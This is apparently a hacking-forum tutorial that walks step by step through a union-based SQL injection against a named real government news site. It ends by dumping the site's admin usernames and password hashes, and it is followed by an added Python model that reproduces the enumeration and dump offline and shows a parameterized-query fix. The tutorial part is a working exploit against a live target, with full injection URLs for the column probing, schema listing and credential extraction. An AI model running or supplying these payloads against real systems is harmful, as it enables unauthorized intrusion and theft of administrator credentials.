- target: http://www.tchjbh.gov.cn/news_display.php?id=148
- This is what it looks like:
- http://i247.photobucket.com/albums/gg151/titian_47/1_zps01dc4846.jpg
- Needed: the Firefox browser with the HackBar add-on. Without HackBar, Chrome works too, as long as you replace every space in the URL with [ + ] or [ %20 ], for example: http://www.tchjbh.gov.cn/news_display.php?id=148+union+select+1--
- 1. Vulnerability check: to test whether the site is vulnerable, add an apostrophe ['] right after the number: [ news_display.php?id=148' ]. The page will show a MySQL error message, which means the id parameter is pasted straight into the query and the site is vulnerable to the injection we are about to do. (A site that hides its database errors can still be injectable; the visible error is just the easiest tell.)
- http://i247.photobucket.com/albums/gg151/titian_47/2_zpsa09eaf04.jpg?t=1403438834
- 2. Column count: to find how many columns the query returns, we test one number at a time until we hit an error, using [ ORDER BY #-- ]:
- http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 1-- no error
- http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 2-- no error
- http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 3-- no error (skipping ahead here, since the error only shows up at 22!)
- http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 22-- MySQL error at 22
- So it errors at ORDER BY 22--, meaning the query has 21 columns (ORDER BY n fails as soon as n is larger than the number of columns in the SELECT).
- 3. Finding the vulnerable column: since the error appeared at 22, we have 21 numbers. Put a [ - ] in front of the id, news_display.php?id=-148, so the real row is not returned and only our UNION row is displayed, then add [ UNION SELECT #-- ] with all 21 numbers:
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
- You will see a number printed on the page: 14. That is the vulnerable (displayed) column, column 14!! Whatever we put in position 14 of the UNION SELECT is what the page will show.
- http://i247.photobucket.com/albums/gg151/titian_47/3_zpsb63fede3.jpg
- 4. SQL version: in position 14 simply put @@version to learn the database version, like this:
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21--
- You will see [ 5.1.56-community ]; that is the MySQL version, version 5. So the union-based method is the right one here, because MySQL 5 has the information_schema database that steps 6 to 8 read the table and column names from. MySQL 4 does not have it, so on version 4 table names have to be guessed and the data pulled out with the blind method.
- http://i247.photobucket.com/albums/gg151/titian_47/4_zps7f8d2870.jpg
- 5. Current user: replace it with [ user() ] to learn the database user:
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21--
- This is what comes out there: tchjbh@127.0.0.1
- http://i247.photobucket.com/albums/gg151/titian_47/5_zpse6b83f3f.jpg
- 6. Database name: just like this!!
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21 from information_schema.schemata--
- or
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database()),15,16,17,18,19,20,21--
- You will see [tchjbh]; that is the database name. (The first query lists every database this user can see; the second returns only the one the page is using.)
- http://i247.photobucket.com/albums/gg151/titian_47/6_zpsf8b95db4.jpg
- 7. Finding the table names. This is the most fun part!! hahaha
- group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--
- Like this:
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21 FROM information_schema.tables WHERE table_schema=database()--
- We will see the list of table names!! But the only one we need is [admininfo], that is the one we will take!! On other sites the table is often called admin, users, members, etc.
- http://i247.photobucket.com/albums/gg151/titian_47/7_zpsae8042fe.jpg
- 8. Finding the column names
- group_concat(column_name) FROM information_schema.columns WHERE table_schema=database()--
- http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21 FROM information_schema.columns WHERE table_schema=database()--
- We will see [ username and passwd ] among the columns. (As written, this lists the columns of every table in the database; on a site with many tables, also filter on table_name so only admininfo's columns come back, and keep in mind that group_concat output is truncated at 1024 characters by default.)
- http://i247.photobucket.com/albums/gg151/titian_47/8_zpsddd3ce3b.jpg
- Last part.
- 9. Dumping the admin and password. Notice that we took the table name and the column names; those are exactly what we use here. [0x3a] is the hex for a colon [:] and goes after username and after passwd as a separator:
- group_concat(username,0x3a,passwd,0x3a) from admininfo--
- http://www.tchjbh.gov.cn/news_display.php?id=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x3a,passwd,0x3a),15,16,17,18,19,20,21+FROM+admininfo--
- http://i247.photobucket.com/albums/gg151/titian_47/9_zps78c6b2b2.jpg?t=1403440294
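The whole procedure above, as an added example that is not part of the original paste and not code from the target site: a Python model of the vulnerable page against an in-memory SQLite database, so steps 1 to 9 can be run offline. Everything about the stand-in is constructed and assumed: a news table with 21 columns of which only column 14 is printed, an admininfo table with two made-up rows, and a news_display() function that concatenates the id parameter into the SQL the way news_display.php presumably does. SQLite has no information_schema, @@version or user(), so the table and column listings read sqlite_master and pragma_table_info instead, and the 0x3a separator becomes ||':'||; the ORDER BY probe, the negative-id UNION trick and the group_concat dump are the same technique. The fixed handler at the end shows why an integer check plus a bound parameter stops all of it.

```python
import sqlite3

# Constructed stand-in for the target: 21 columns (id plus c2..c21) and a page
# that prints only column 14 (index 13), which is why "14" shows up on screen.
NUM_COLS = 21
DISPLAYED = [13]


def build_db():
    con = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, NUM_COLS + 1))
    con.execute(f"CREATE TABLE news (id INTEGER, {cols})")
    vals = ", ".join(f"'n{i}'" for i in range(2, NUM_COLS + 1))
    con.execute(f"INSERT INTO news VALUES (148, {vals})")
    con.execute("CREATE TABLE admininfo (username TEXT, passwd TEXT)")
    con.executemany("INSERT INTO admininfo VALUES (?, ?)",
                    [("admin", "e10adc3949ba59abbe56e057f20f883e"),  # constructed rows
                     ("editor", "letmein")])
    return con


def news_display_vulnerable(con, id_param):
    # The bug: the request parameter is pasted straight into the SQL text
    # (assumed to be what news_display.php does, given the error on id=148').
    return con.execute(f"SELECT * FROM news WHERE id={id_param}").fetchall()


def news_display_fixed(con, id_param):
    # The fix: check the type, then bind the value; the SQL text is constant.
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT * FROM news WHERE id=?", (news_id,)).fetchall()


def page(con, id_param):
    """What the visitor sees: the displayed columns of every returned row."""
    rows = news_display_vulnerable(con, id_param)
    return [str(row[i]) for row in rows for i in DISPLAYED]


def shows_error(con, id_param):
    """Step 1: a database error on id=148' is the tell."""
    try:
        page(con, id_param)
        return False
    except sqlite3.Error:
        return True


def probe_column_count(con, max_cols=50):
    """Step 2: ORDER BY n errors out once n exceeds the column count."""
    for n in range(1, max_cols + 1):
        if shows_error(con, f"148 ORDER BY {n}--"):
            return n - 1
    return None


def find_reflected_columns(con, ncols):
    """Step 3: id=-148 empties the real result, so only the UNION row's numbers
    get printed; whichever numbers appear are the usable columns."""
    nums = ",".join(str(i) for i in range(1, ncols + 1))
    cells = page(con, f"-148 UNION SELECT {nums}--")
    return [i for i in range(1, ncols + 1) if str(i) in cells]


def union_payload(ncols, col, expr, tail=""):
    """Build '-148 UNION SELECT 1,..,<expr>,..,N<tail>--' with expr in column col."""
    cells = [str(i) for i in range(1, ncols + 1)]
    cells[col - 1] = expr
    return f"-148 UNION SELECT {','.join(cells)}{tail}--"


def enumerate_and_dump(con):
    """Steps 2, 3, 7, 8 and 9 end to end against the SQLite stand-in."""
    ncols = probe_column_count(con)
    col = find_reflected_columns(con, ncols)[0]
    tables = page(con, union_payload(ncols, col, "group_concat(name)",
                                     " FROM sqlite_master WHERE type='table'"))[0]
    columns = page(con, union_payload(ncols, col, "group_concat(name)",
                                      " FROM pragma_table_info('admininfo')"))[0]
    creds = page(con, union_payload(ncols, col, "group_concat(username||':'||passwd)",
                                    " FROM admininfo"))[0]
    return {"columns": ncols, "reflected": col, "tables": tables,
            "admininfo_columns": columns, "creds": creds}


if __name__ == "__main__":
    db = build_db()
    print("injectable:", shows_error(db, "148'"))
    print(enumerate_and_dump(db))
    dump = union_payload(NUM_COLS, 14, "group_concat(passwd)", " FROM admininfo")
    print("fixed handler on the dump payload:", news_display_fixed(db, dump))
```

Running it prints the 21-column count, column 14 as the reflected one, the table and column lists and the admin:hash pairs, then an empty result from news_display_fixed() for the same payload. The fix is the bound parameter, not the int() check alone: the check is there so a non-numeric id fails cleanly instead of reaching the database at all.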